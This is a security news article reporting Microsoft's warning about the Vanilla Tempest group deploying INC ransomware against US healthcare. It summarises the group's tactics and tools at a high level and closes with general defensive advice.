Microsoft Warns of Dangerous and Debilitating INC Ransomware Targeting Healthcare Systems

healthcare systems targeted

Microsoft has recently issued a warning about a new ransomware threat, dubbed INC, that is targeting the U.S. healthcare sector. This revelation comes from Microsoft’s threat intelligence team, which has been closely monitoring the activities of a financially motivated hacker group, known as Vanilla Tempest (formerly DEV-0832).

Vanilla Tempest and Its Tactics

Vanilla Tempest’s cyberattacks are sophisticated and involve a well-coordinated process. The group's tactics include receiving hand-offs from GootLoader infections orchestrated by the notorious threat actor Storm-0494. Following the GootLoader delivery, they use a variety of tools to gain control of target systems, including:

  • Supper: A malicious backdoor program
  • AnyDesk: A legitimate remote monitoring and management tool
  • MEGA: A cloud storage tool used for data synchronization

Once inside the system, the attackers initiate lateral movements using Remote Desktop Protocol (RDP) and Windows Management Instrumentation (WMI) Provider Host, before ultimately deploying the INC ransomware payload.

A Growing Threat Across Multiple Sectors

Vanilla Tempest has been active since at least July 2022, previously targeting industries like education, IT, and manufacturing. In the past, they have employed notorious ransomware strains like BlackCat, Quantum Locker, Zeppelin, and Rhysida. The healthcare sector, however, has become a prime target, given its critical nature and the large amounts of sensitive data it handles.

Notably, Vanilla Tempest is also known under the alias Vice Society, a group that favors leveraging pre-existing ransomware lockers instead of developing their own, a strategy that allows them to act quickly and effectively.

Evolving Techniques to Evade Detection

Ransomware gangs are continually evolving their tactics to avoid detection. In a related development, groups like BianLian and Rhysida have been observed using tools such as Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised systems. These tools, designed to manage Azure storage, are now being repurposed for large-scale data transfers to cloud storage, making it difficult for cybersecurity teams to detect and prevent these attacks.

Protecting the Healthcare Sector

As ransomware groups continue to innovate their techniques, particularly targeting vital sectors like healthcare, organizations must remain vigilant and proactive in their cybersecurity measures. Microsoft’s timely warning emphasizes the growing need for healthcare organizations to employ robust security protocols, including up-to-date anti-malware software and secure network practices, to fend off these increasingly sophisticated threats.

By staying ahead of ransomware groups like Vanilla Tempest, the healthcare sector can better protect its valuable data and avoid becoming the next victim of this financial and data extortion scheme.

September 19, 2024
Loading...

Cyclonis Backup Details & Terms

The Free Basic Cyclonis Backup plan gives you 2 GB of cloud storage space with full functionality! No credit card required. Need more storage space? Purchase a larger Cyclonis Backup plan today! To learn more about our policies and pricing, see Terms of Service, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Cyclonis Password Manager Details & Terms

FREE Trial: 30-Day One-Time Offer! No credit card required for Free Trial. Full functionality for the length of the Free Trial. (Full functionality after Free Trial requires subscription purchase.) To learn more about our policies and pricing, see EULA, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.